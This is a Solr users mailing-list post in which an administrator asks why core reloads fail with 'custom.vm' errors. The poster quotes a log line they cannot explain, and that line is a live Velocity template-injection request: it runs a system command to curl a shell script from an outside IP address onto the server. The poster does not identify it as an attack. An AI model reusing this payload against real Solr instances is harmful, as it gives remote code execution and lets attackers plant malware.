Re: Admin UI core loading fails

Mon, 06 Apr 2020 10:39:25 -0700

I failed to include this line in my first post. This /select call with strange parameters (q=1) seems to be happening periodically even when I don't do any operation on Admin UI. I scanned the Solr source code, /opt/solr and /var/solr/data and I couldn't find the source of this call.
2020-04-04 00:41:02.604 INFO (qtp231311211-24) [   x:my_core] o.a.s.c.S.Request [my_core] webapp=/solr path=/select params={*q=1*&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('curl+-o+/tmp/zzz+217.12.209.234/s.sh'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity} hits=0 status=0 QTime=1 


On 4/2/20 12:50 AM, TK Solr wrote:

I'm on Solr 8.3.1 running in non-solrcloud mode.


When I tried to reload an existing core from Admin UI's "Core Admin" by 
clicking Reload, after modifying the core's conf/managed-schema, no error was 
reported. But the newly added field type is not shown in the core's Analyzer 
section.



I selected Logging from the side bar, I saw errors like this for every core, 
not just the core I tried to reload.


null:java.io.IOException: Unable to find resource 'custom.vm'

    at 
org.apache.solr.response.VelocityResponseWriter.getTemplate(VelocityResponseWriter.java:374)
    at 
org.apache.solr.response.VelocityResponseWriter.write(VelocityResponseWriter.java:152)
    at 
org.apache.solr.response.QueryResponseWriterUtil.writeQueryResponse(QueryResponseWriterUtil.java:65)

    at org.apache.solr.servlet.HttpSolrCall.writeResponse(HttpSolrCall.java:892)
    at org.apache.solr.servlet.HttpSolrCall.call(HttpSolrCall.java:594)

    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:419)
    at 
org.apache.solr.servlet.SolrDispatchFilter.doFilter(SolrDispatchFilter.java:351)
    at 
org.eclipse.jetty.servlet.ServletHandler$CachedChain.doFilter(ServletHandler.java:1602)

    at 
org.eclipse.jetty.servlet.ServletHandler.doHandle(ServletHandler.java:540)


I could not find any mention of custom.vm in any files under any core's conf 
directory.



I restarted Solr, the core was loaded without an error and I can see the newly 
added filed type.


What could be the cause of these errors that only happens with the Reload 
button?

TK
























					Reply via email to